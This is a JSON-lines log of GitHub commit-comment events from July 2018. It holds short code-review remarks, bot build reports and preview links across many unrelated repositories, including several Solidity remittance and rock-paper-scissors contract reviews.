{"id":"7952735489","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677309,"position":257,"line":226,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:38:49Z","updated_at":"2018-07-11T21:38:49Z","author_association":"NONE","body":"`else` ?"}},"created_at":"2018-07-11T21:38:49Z"}
{"id":"7952744030","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29677316,"position":null,"line":null,"path":null,"commit_id":"7c45188d0e897d33d9c25830d56118456b5cae02","created_at":"2018-07-11T21:40:52Z","updated_at":"2018-07-11T21:40:52Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T21:40:52Z"}
{"id":"7952746269","type":"CommitCommentEvent","actor":{"login":"jacobq"},"repo":{"name":"felixrieseberg/ember-electron"},"payload":{"comment":{"id":29677324,"position":5,"line":5,"path":"lib/tasks/electron-test-mixin.js","commit_id":"eddbc8f75b9eb33e9b0d5a6d81b0214b110e4ea7","created_at":"2018-07-11T21:41:23Z","updated_at":"2018-07-11T21:41:23Z","author_association":"CONTRIBUTOR","body":"@bendemboski Could you help me understand why was this needed? Is it still needed today? (I'm thinking of taking it out in my PR)"}},"created_at":"2018-07-11T21:41:23Z"}
{"id":"7952746465","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29677325,"position":1,"line":1432,"path":"build/contracts/Migrations.json","commit_id":"6d8104d825ebcd2d5d8d9981cad4cbaa77fb3a67","created_at":"2018-07-11T21:41:26Z","updated_at":"2018-07-11T21:41:26Z","author_association":"NONE","body":"Could add `*.json` to `.gitignore` so we don't have to wade through these. "}},"created_at":"2018-07-11T21:41:26Z"}
{"id":"7952747185","type":"CommitCommentEvent","actor":{"login":"TVolden"},"repo":{"name":"OhmEnergy/Java-OCA-OCPP"},"payload":{"comment":{"id":29677328,"position":null,"line":null,"path":null,"commit_id":"6827dfa2bc001f00d9f35c50e0db38f9631ac4e5","created_at":"2018-07-11T21:41:37Z","updated_at":"2018-07-11T21:41:37Z","author_association":"NONE","body":"Interesting, I have an issue with the remote start transaction when adding a charging profile. Please take a look, do you think your changes can fix it?\r\nhttps://github.com/ChargeTimeEU/Java-OCA-OCPP/issues/71"}},"created_at":"2018-07-11T21:41:37Z"}
{"id":"7952752782","type":"CommitCommentEvent","actor":{"login":"jtfbwilson"},"repo":{"name":"xrp-community/codius-install"},"payload":{"comment":{"id":29677337,"position":13,"line":64,"path":"codius-install.sh","commit_id":"10ff88fce333fc833e39e2d1fa3f0b7b18f75135","created_at":"2018-07-11T21:42:57Z","updated_at":"2018-07-11T21:42:57Z","author_association":"NONE","body":"I don't get this error, I have more than enough in the wallet I am using for the server....."}},"created_at":"2018-07-11T21:42:57Z"}
{"id":"7952754349","type":"CommitCommentEvent","actor":{"login":"lwaldron"},"repo":{"name":"Bioconductor/RaggedExperiment"},"payload":{"comment":{"id":29677342,"position":8,"line":118,"path":"man/assay-functions.Rd","commit_id":"9fdcfbf0779d3508af7ae0afc288f946758b60d6","created_at":"2018-07-11T21:43:19Z","updated_at":"2018-07-11T21:43:19Z","author_association":"NONE","body":"I agree, you could keep the same RE but just change the query e.g. to GRanges(c(\"A:1-5\",  \"B:1-5\"))"}},"created_at":"2018-07-11T21:43:19Z"}
{"id":"7952754371","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29677343,"position":null,"line":null,"path":null,"commit_id":"a8aa4939500e845ed6544c4aa3a179ab321044b1","created_at":"2018-07-11T21:43:19Z","updated_at":"2018-07-11T21:43:19Z","author_association":"CONTRIBUTOR","body":"Don't forget all the keyCodes [here](https://github.com/elix/elix/blob/a1951f0dfb04425a6a23581a9b4c5c735ca5bfa5/test/tests/KeyboardDirectionMixin.tests.js) and [here](https://github.com/elix/elix/blob/a1951f0dfb04425a6a23581a9b4c5c735ca5bfa5/test/tests/KeyboardPagedSelectionMixin.tests.js)"}},"created_at":"2018-07-11T21:43:19Z"}
{"id":"7952754720","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29677344,"position":52,"line":57,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-11T21:43:24Z","updated_at":"2018-07-11T21:43:24Z","author_association":"NONE","body":"Let's concentrate on the security for now. Can you see how you don't really need the _passwordExchange when you `require(msg.sender ==` ?"}},"created_at":"2018-07-11T21:43:24Z"}
{"id":"7952754929","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29677346,"position":68,"line":42,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T21:43:27Z","updated_at":"2018-07-11T21:43:27Z","author_association":"NONE","body":"Which comments? `/** */` or those I write here?"}},"created_at":"2018-07-11T21:43:27Z"}
{"id":"7952755065","type":"CommitCommentEvent","actor":{"login":"emanlotfy52"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29677347,"position":null,"line":null,"path":null,"commit_id":"51e935b8a653c72e22acc9c34282fe88da79dbf3","created_at":"2018-07-11T21:43:29Z","updated_at":"2018-07-11T21:43:29Z","author_association":"NONE","body":"great ! thanks alot udacity ^^"}},"created_at":"2018-07-11T21:43:29Z"}
{"id":"7952755812","type":"CommitCommentEvent","actor":{"login":"charlchi"},"repo":{"name":"charlchi/42"},"payload":{"comment":{"id":29677349,"position":null,"line":null,"path":null,"commit_id":"3aecb2442aa1de887b8a12f7df90b795702c97b9","created_at":"2018-07-11T21:43:41Z","updated_at":"2018-07-11T21:43:41Z","author_association":"OWNER","body":"damn"}},"created_at":"2018-07-11T21:43:41Z"}
{"id":"7952758079","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29677354,"position":73,"line":44,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T21:44:13Z","updated_at":"2018-07-11T21:44:13Z","author_association":"NONE","body":"Keep it simple, within this one contract. It is possible."}},"created_at":"2018-07-11T21:44:13Z"}
{"id":"7952760437","type":"CommitCommentEvent","actor":{"login":"minafarid"},"repo":{"name":"firebase/firebase-ios-sdk"},"payload":{"comment":{"id":29677360,"position":1,"line":2,"path":"Firestore/Example/FuzzTests/FuzzingResources/Serializer/serializer.dictionary","commit_id":"5ca06270672f2fb4c00e094c279492391f8096d6","created_at":"2018-07-11T21:44:48Z","updated_at":"2018-07-11T21:44:48Z","author_association":"COLLABORATOR","body":"No, fixed."}},"created_at":"2018-07-11T21:44:48Z"}
{"id":"7952761675","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29677362,"position":101,"line":63,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T21:45:07Z","updated_at":"2018-07-11T21:45:07Z","author_association":"NONE","body":"My concern is that after they have been used and disclosed, someone in the future may be tempted to use the same values. But because they are already disclosed, it would be a safety risk."}},"created_at":"2018-07-11T21:45:07Z"}
{"id":"7952763347","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29677365,"position":123,"line":72,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T21:45:29Z","updated_at":"2018-07-11T21:45:29Z","author_association":"NONE","body":"Can you find a reason to make it public?"}},"created_at":"2018-07-11T21:45:29Z"}
{"id":"7952765171","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29677367,"position":4,"line":45,"path":"contracts/Remittance.sol","commit_id":"6d8104d825ebcd2d5d8d9981cad4cbaa77fb3a67","created_at":"2018-07-11T21:45:55Z","updated_at":"2018-07-11T21:45:55Z","author_association":"NONE","body":"What about passing a `duration` into the function? You could even pass a minimum duration into the constructor to support some validation - to avoid hard-coding this number. "}},"created_at":"2018-07-11T21:45:55Z"}
{"id":"7952768238","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29677372,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T21:46:38Z","updated_at":"2018-07-11T21:46:38Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-11T21:46:38Z"}
{"id":"7952776284","type":"CommitCommentEvent","actor":{"login":"psper"},"repo":{"name":"ttn-zh/gateway-remote-config"},"payload":{"comment":{"id":29677386,"position":6,"line":6,"path":"B827EBFFFEE2655D.json","commit_id":"3be4fc47c7c586fec8c5bc8d000e87a034ae8976","created_at":"2018-07-11T21:48:34Z","updated_at":"2018-07-11T21:48:34Z","author_association":"NONE","body":"\"server_address\": \"router.eu.thethings.network\",\r\n"}},"created_at":"2018-07-11T21:48:34Z"}
{"id":"7952777657","type":"CommitCommentEvent","actor":{"login":"eccentricdevotion"},"repo":{"name":"eccentricdevotion/TARDIS"},"payload":{"comment":{"id":29677387,"position":null,"line":null,"path":null,"commit_id":"0900ef4057d5622b9149a674533052218afc1a73","created_at":"2018-07-11T21:48:55Z","updated_at":"2018-07-11T21:48:55Z","author_association":"OWNER","body":"Fixes #72"}},"created_at":"2018-07-11T21:48:55Z"}
{"id":"7952778151","type":"CommitCommentEvent","actor":{"login":"fertapric"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29677388,"position":null,"line":null,"path":null,"commit_id":"fb4aaafddee47a78c69729f808efc5b52d6f825b","created_at":"2018-07-11T21:49:02Z","updated_at":"2018-07-11T21:49:02Z","author_association":"NONE","body":"👏 "}},"created_at":"2018-07-11T21:49:02Z"}
{"id":"7952779741","type":"CommitCommentEvent","actor":{"login":"f34rdotcom"},"repo":{"name":"nutechsoftware/alarmdecoder-webapp"},"payload":{"comment":{"id":29677393,"position":null,"line":null,"path":null,"commit_id":"46dd485ff6036a7ea198051ac55c9738bddecf37","created_at":"2018-07-11T21:49:27Z","updated_at":"2018-07-11T21:49:27Z","author_association":"CONTRIBUTOR","body":"This ticket was someone using PIP and building his own system not using our image likely using docker. Not sure if his update method would work with our image as we use github not pip on our image."}},"created_at":"2018-07-11T21:49:27Z"}
{"id":"7952781190","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29677395,"position":59,"line":1213,"path":"pom.xml","commit_id":"7e3b76fb02921aefad60968044e139eced036037","created_at":"2018-07-11T21:49:48Z","updated_at":"2018-07-11T21:49:48Z","author_association":"CONTRIBUTOR","body":"It will work without issue AFAIK, but you can also just remove that compression setting and leave the NSI code handle it as it is."}},"created_at":"2018-07-11T21:49:48Z"}
{"id":"7952786115","type":"CommitCommentEvent","actor":{"login":"pilz"},"repo":{"name":"plone/plone.app.contenttypes"},"payload":{"comment":{"id":29677405,"position":16,"line":83,"path":"plone/app/contenttypes/content.py","commit_id":"1b6c75dae22cee9ad13b99fb013cd02189ff2d9a","created_at":"2018-07-11T21:50:55Z","updated_at":"2018-07-11T21:50:55Z","author_association":"MEMBER","body":"Ok, I know a bit more. This method overrides the PUT from https://github.com/plone/plone.dexterity/blob/master/plone/dexterity/filerepresentation.py#L124 which does the same but also handles mimetype of content. That way, ExternalEditor is able to send in its RFC822 data and get it decoded before writing. The original PUT method supports adapting the way how the write happens via the IRawWriteFile Interface. Perhaps we can just provide a better adapter that allows DAV and EE."}},"created_at":"2018-07-11T21:50:55Z"}
{"id":"7952786253","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29677406,"position":52,"line":57,"path":"contracts/Remittance.sol","commit_id":"0d6c0cff0432c8ae16e0c571fc6790616457e5d4","created_at":"2018-07-11T21:50:57Z","updated_at":"2018-07-11T21:50:57Z","author_association":"OWNER","body":"gotcha. the project instructions state that both passwords needed to be submitted by the exchange, but you are right, there is no need for that."}},"created_at":"2018-07-11T21:50:57Z"}
{"id":"7952789061","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29677410,"position":59,"line":1213,"path":"pom.xml","commit_id":"7e3b76fb02921aefad60968044e139eced036037","created_at":"2018-07-11T21:51:40Z","updated_at":"2018-07-11T21:51:40Z","author_association":"CONTRIBUTOR","body":"@Sami32 I think you misunderstand, I don't think it will work the way compression is defined (with a class instead of with separate fields). I'll see if I can change it without too much work though, as I see your point."}},"created_at":"2018-07-11T21:51:40Z"}
{"id":"7952789074","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29677411,"position":null,"line":null,"path":null,"commit_id":"5da7b456b0b375502d230857438306a17b026967","created_at":"2018-07-11T21:51:41Z","updated_at":"2018-07-11T21:51:41Z","author_association":"OWNER","body":"Resolves #9 "}},"created_at":"2018-07-11T21:51:41Z"}
{"id":"7952790194","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29677414,"position":59,"line":1213,"path":"pom.xml","commit_id":"7e3b76fb02921aefad60968044e139eced036037","created_at":"2018-07-11T21:51:57Z","updated_at":"2018-07-11T21:51:57Z","author_association":"CONTRIBUTOR","body":"@Sami32 By the way, log on..."}},"created_at":"2018-07-11T21:51:57Z"}
{"id":"7952792265","type":"CommitCommentEvent","actor":{"login":"aida2gtech"},"repo":{"name":"aida2gtech/SkillsWorkshop2018"},"payload":{"comment":{"id":29677418,"position":null,"line":null,"path":null,"commit_id":"e1dce9191985c1877953786581e6836104fd0010","created_at":"2018-07-11T21:52:29Z","updated_at":"2018-07-11T21:52:29Z","author_association":"OWNER","body":"used basic operators to perform simple calculations... also trying to get familiar with github"}},"created_at":"2018-07-11T21:52:29Z"}
{"id":"7952796913","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29677421,"position":null,"line":null,"path":null,"commit_id":"c18ff00a95027cb5948d3bec63cc98db19021cbf","created_at":"2018-07-11T21:53:38Z","updated_at":"2018-07-11T21:53:38Z","author_association":"COLLABORATOR","body":"<h3>[docs] fix broken links (#2680)</h3>\n\nPreview: <strong><a href='https://18491-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18491-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18491-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T21:53:38Z"}
{"id":"7952799092","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29677428,"position":5,"line":102,"path":"src/Puppet/Runner/Preferences.hs","commit_id":"cb3bac7fbfdc4c091b1594f005ac97f07c1574a3","created_at":"2018-07-11T21:54:11Z","updated_at":"2018-07-11T21:54:11Z","author_association":"COLLABORATOR","body":"I believe `Just <$>` can be omitted while keeping correctness ?\r\nAlso we need to increase the lower bound of `yaml` from `0.8.8` to `0.8.31`"}},"created_at":"2018-07-11T21:54:11Z"}
{"id":"7952802422","type":"CommitCommentEvent","actor":{"login":"alanhartless"},"repo":{"name":"mautic/mautic"},"payload":{"comment":{"id":29677433,"position":5,"line":90,"path":"app/bundles/LeadBundle/Services/LeadSegmentQueryBuilder.php","commit_id":"53218d831b66efa257789157dc43ada31f345b53","created_at":"2018-07-11T21:54:58Z","updated_at":"2018-07-11T21:54:58Z","author_association":"CONTRIBUTOR","body":"this was a WIP commit that was later changed; in fact this file was deleted by final merge"}},"created_at":"2018-07-11T21:54:58Z"}
{"id":"7952803004","type":"CommitCommentEvent","actor":{"login":"Louis-Petingi"},"repo":{"name":"Louis-Petingi/Partition-Algorithm-2"},"payload":{"comment":{"id":29677436,"position":null,"line":null,"path":null,"commit_id":"63ad5b797a691cce7f2a2c980956e3879fba2de4","created_at":"2018-07-11T21:55:07Z","updated_at":"2018-07-11T21:55:07Z","author_association":"OWNER","body":"The output file is written into \r\noutfile.open(\"C:/Users/lpetn_000/desktop/RnaDv/PKB236-out.txt\");\r\n\r\n\r\n\r\n ===================== New Block ================== \r\n\r\n(6,0) - (5,6) - (5,6) - (4,5) - (4,5) - (3,4) - (3,4) - (2,3) - (2,3) - (1,2) - (1,2) - (0,1) - (0,1) - \r\n\r\ndegree of 6 is 3\r\ndegree of 5 is 4\r\ndegree of 4 is 4\r\ndegree of 3 is 4\r\ndegree of 2 is 4\r\ndegree of 0 is 3\r\ndegree of 1 is 4\r\n\r\n ---- this block represents a pseudoknot ---- \r\n\r\n----------- Summary information for Motif :PKB 236 --------------------------------\r\n----------- Total number of blocks: 1\r\n----------- number of PK blocks: 1\r\n----------- number of regular blocks : 0\r\n-------------------------------------------------------------------------------------\r\n"}},"created_at":"2018-07-11T21:55:07Z"}
{"id":"7952805509","type":"CommitCommentEvent","actor":{"login":"shyaniv7"},"repo":{"name":"shyaniv7/react-navigation"},"payload":{"comment":{"id":29677442,"position":null,"line":null,"path":null,"commit_id":"20594229df37a9a08c8a8f117b680498365f1316","created_at":"2018-07-11T21:55:44Z","updated_at":"2018-07-11T21:55:44Z","author_association":"OWNER","body":"or even better \r\n\r\n```\r\nif ( !stackActions[action.type] ) { return; }\r\n```"}},"created_at":"2018-07-11T21:55:44Z"}
{"id":"7952805552","type":"CommitCommentEvent","actor":{"login":"jIdle"},"repo":{"name":"jIdle/CS333"},"payload":{"comment":{"id":29677443,"position":48,"line":170,"path":"xv6/sysproc.c","commit_id":"3164508b919250601942f660d7c4e7348141c362","created_at":"2018-07-11T21:55:44Z","updated_at":"2018-07-11T21:55:44Z","author_association":"OWNER","body":"Need to figure out how to get argptr to give me the procData from ps.c, but I also want to use it as a double pointer rather than a single, which makes this whole situation annoying as I'm technically not supposed to raw pass in a double pointer procTable (P2 Instructions)."}},"created_at":"2018-07-11T21:55:44Z"}
{"id":"7952808497","type":"CommitCommentEvent","actor":{"login":"ibell"},"repo":{"name":"CoolProp/CoolProp"},"payload":{"comment":{"id":29677452,"position":null,"line":null,"path":null,"commit_id":"0fdc8b2125bc011e99117b456eef672656be7ef9","created_at":"2018-07-11T21:56:27Z","updated_at":"2018-07-11T21:56:27Z","author_association":"CONTRIBUTOR","body":"This has been fixed in master.  A fresh recursive clone fixes this.\n\nOn Wed, Jul 11, 2018, 11:54 AM Ole Thomsen Buus <notifications@github.com>\nwrote:\n\n> See #1697 <https://github.com/CoolProp/CoolProp/issues/1697>. Solved by\n> updating the URL in .gitmodules (on master).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CoolProp/CoolProp/commit/0fdc8b2125bc011e99117b456eef672656be7ef9#commitcomment-29673291>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABxhaw2ChRVA4BT8Pviaiqz9JE46UsW5ks5uFh-mgaJpZM4L3L3b>\n> .\n>\n"}},"created_at":"2018-07-11T21:56:27Z"}
{"id":"7952810836","type":"CommitCommentEvent","actor":{"login":"sergpolly"},"repo":{"name":"dekkerlab/cooltools"},"payload":{"comment":{"id":29677454,"position":null,"line":null,"path":null,"commit_id":"c4e6b14fee12604ba3b09a856496df541578a513","created_at":"2018-07-11T21:57:03Z","updated_at":"2018-07-11T21:57:03Z","author_association":"MEMBER","body":"Lesson learned - check types used in a cooler file or explicitly cast them, otherwise accidents could happen.\r\n```hic2cool``` produced cooler had ```int32``` as ```start/end``` column type and that screwed clustering of filtered peaks in our script - took 2 days to figure out ..."}},"created_at":"2018-07-11T21:57:03Z"}
{"id":"7952813202","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29677459,"position":null,"line":null,"path":null,"commit_id":"36be86000ceede98dea8d781c3d671fa7b732422","created_at":"2018-07-11T21:57:39Z","updated_at":"2018-07-11T21:57:39Z","author_association":"COLLABORATOR","body":"<h3>Publish</h3>\n\nPreview: <strong><a href='https://18498-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18498-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18498-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T21:57:39Z"}
{"id":"7952813225","type":"CommitCommentEvent","actor":{"login":"maxdavidson"},"repo":{"name":"oBusk/typescript-library-boilerplate"},"payload":{"comment":{"id":29677460,"position":null,"line":null,"path":null,"commit_id":"6c9ae10842438e889160a278940918c1c5de8a04","created_at":"2018-07-11T21:57:40Z","updated_at":"2018-07-11T21:57:40Z","author_association":"NONE","body":"Hi Oscar, I appreciate your interest in my project! If you wish to improve on you are free to modify the code all you want, and I will also happily accept pull requests. It is not okay for you to replace my name with yours in the copyright notice; that is in fact a breach of the MIT license and also quite uncool.\r\n"}},"created_at":"2018-07-11T21:57:40Z"}
{"id":"7952818838","type":"CommitCommentEvent","actor":{"login":"dgrammatiko"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29677472,"position":9,"line":586,"path":"administrator/templates/atum/css/template-rtl.css","commit_id":"984c4582a57fa4efe69c7f858d7144b4993d414b","created_at":"2018-07-11T21:59:07Z","updated_at":"2018-07-11T21:59:07Z","author_association":"MEMBER","body":"This is not the best solution here. The svg needs to be inlined in the page (with display: none;) and then just use `background: url('#joomla-background');` where joomla-background is the id of the svg. Better explained here:\r\n\r\nhttps://css-tricks.com/forums/topic/svg-sprite-symbols-as-css-content-or-background/"}},"created_at":"2018-07-11T21:59:07Z"}
{"id":"7952822864","type":"CommitCommentEvent","actor":{"login":"igorbende"},"repo":{"name":"igorbende/test"},"payload":{"comment":{"id":29677486,"position":null,"line":null,"path":null,"commit_id":"adf0070b1693332d151b3d96bb3aa7e69a88269e","created_at":"2018-07-11T22:00:04Z","updated_at":"2018-07-11T22:00:04Z","author_association":"OWNER","body":"bvbxc"}},"created_at":"2018-07-11T22:00:04Z"}
{"id":"7952823190","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29677489,"position":null,"line":null,"path":null,"commit_id":"6c6e48a52587df105595ce7893602c93a829992f","created_at":"2018-07-11T22:00:09Z","updated_at":"2018-07-11T22:00:09Z","author_association":"OWNER","body":"Yes and yes."}},"created_at":"2018-07-11T22:00:09Z"}
{"id":"7952825218","type":"CommitCommentEvent","actor":{"login":"JanMiksovsky"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29677497,"position":null,"line":null,"path":null,"commit_id":"a8aa4939500e845ed6544c4aa3a179ab321044b1","created_at":"2018-07-11T22:00:35Z","updated_at":"2018-07-11T22:00:35Z","author_association":"MEMBER","body":"We're in the middle of transitioning from using `keyCode` to using `key` everywhere. A long while back, `key` hadn't been universally supported, forcing the use of the more cumbersome `keyCode`.\r\n\r\nFor the time being, most mixins still use `keyCode`, while newer ones use `key`. As long as the unit tests use the same `key`/`keyCode` as the mixin they're testing, things should continue to work.\r\n\r\nWe might opportunistically transition mixins to use `key` when doing other work on them (as in the recent updates to KeyboardPrefixSelectionMixin occasioned by your work) or, if time allows, make a complete pass to transition everything. My preference would be for the latter, but I might not have time to tackle that for a little while."}},"created_at":"2018-07-11T22:00:35Z"}
{"id":"7952825419","type":"CommitCommentEvent","actor":{"login":"Zorrototo"},"repo":{"name":"carterkelly9/OGP-Website"},"payload":{"comment":{"id":29677498,"position":null,"line":null,"path":null,"commit_id":"f9a03438fe7c4e26b2e593e35b0c7587c79b0b55","created_at":"2018-07-11T22:00:37Z","updated_at":"2018-07-11T22:00:37Z","author_association":"NONE","body":"To be even better it is **M**ySQL :)"}},"created_at":"2018-07-11T22:00:37Z"}
{"id":"7952825631","type":"CommitCommentEvent","actor":{"login":"brianteeman"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29677502,"position":9,"line":586,"path":"administrator/templates/atum/css/template-rtl.css","commit_id":"984c4582a57fa4efe69c7f858d7144b4993d414b","created_at":"2018-07-11T22:00:40Z","updated_at":"2018-07-11T22:00:40Z","author_association":"CONTRIBUTOR","body":"it also doesnt work in ie11"}},"created_at":"2018-07-11T22:00:40Z"}
{"id":"7952829734","type":"CommitCommentEvent","actor":{"login":"roesslerj"},"repo":{"name":"retest/recheck-web"},"payload":{"comment":{"id":29677509,"position":null,"line":null,"path":null,"commit_id":"cd1fd43a13a86579fc2c6c490c574cd4613577f2","created_at":"2018-07-11T22:01:43Z","updated_at":"2018-07-11T22:01:43Z","author_association":"CONTRIBUTOR","body":"IMHO: Don't waste time reviewing work in progress, that has not yet become a PR ;-)\r\n\r\nI think the `README.md` should target users. Because only if someone thinks this is cool and worthwhile improving, she converts from user to contributor. The readme should give a clear start to a novice user. And to me, this part of how recheck works is very important. But of course I am open for discussion :-)"}},"created_at":"2018-07-11T22:01:43Z"}
{"id":"7952830014","type":"CommitCommentEvent","actor":{"login":"Bob693"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29677510,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-11T22:01:47Z","updated_at":"2018-07-11T22:01:47Z","author_association":"OWNER","body":"I'm sure you do. I'm sure you also love stealing names of projects of people you hate (Fireball OTP!!!!!)"}},"created_at":"2018-07-11T22:01:47Z"}
{"id":"7952833533","type":"CommitCommentEvent","actor":{"login":"Darokrithia"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29677518,"position":null,"line":null,"path":null,"commit_id":"e2fb692af7f643151c4d1e5cc3664c089c0312a1","created_at":"2018-07-11T22:02:39Z","updated_at":"2018-07-11T22:02:39Z","author_association":"COLLABORATOR","body":"Thanks for doing this @loup99 !!!  I was going to do it, but I've been busy"}},"created_at":"2018-07-11T22:02:39Z"}
{"id":"7952844067","type":"CommitCommentEvent","actor":{"login":"bendemboski"},"repo":{"name":"felixrieseberg/ember-electron"},"payload":{"comment":{"id":29677551,"position":5,"line":5,"path":"lib/tasks/electron-test-mixin.js","commit_id":"eddbc8f75b9eb33e9b0d5a6d81b0214b110e4ea7","created_at":"2018-07-11T22:05:24Z","updated_at":"2018-07-11T22:05:24Z","author_association":"COLLABORATOR","body":"It was meant for compatibility reasons. We have our own version of `testem` called out in `package.json`, and then used here rather than inherited from `ember-cli`. The idea was that if `ember-cli` updated its version of `testem`, we would still be using our version rather than whatever version it updated to. As it turns out, that didn't really help since when `ember-cli` updated `testem`, it also changed its API to configure it, which is the breakage you're trying to address here.\r\n\r\nSo, I'd say it's fine to remove this, and also to remove `testem` from our `dependencies` in `package.json`, and in the future if `ember-cli` updates `testem`, we'll just have to update the addon like you're doing right now."}},"created_at":"2018-07-11T22:05:24Z"}
{"id":"7952853404","type":"CommitCommentEvent","actor":{"login":"vikmeup"},"repo":{"name":"ellaism/trust-ray"},"payload":{"comment":{"id":29677580,"position":4,"line":47,"path":"src/routes/ApiRoutes.ts","commit_id":"5b8337a404d70fef29e996d5000fd539ec791191","created_at":"2018-07-11T22:07:50Z","updated_at":"2018-07-11T22:07:50Z","author_association":"NONE","body":"This is wrong, client should be calculating gas price, via RPC node!"}},"created_at":"2018-07-11T22:07:50Z"}
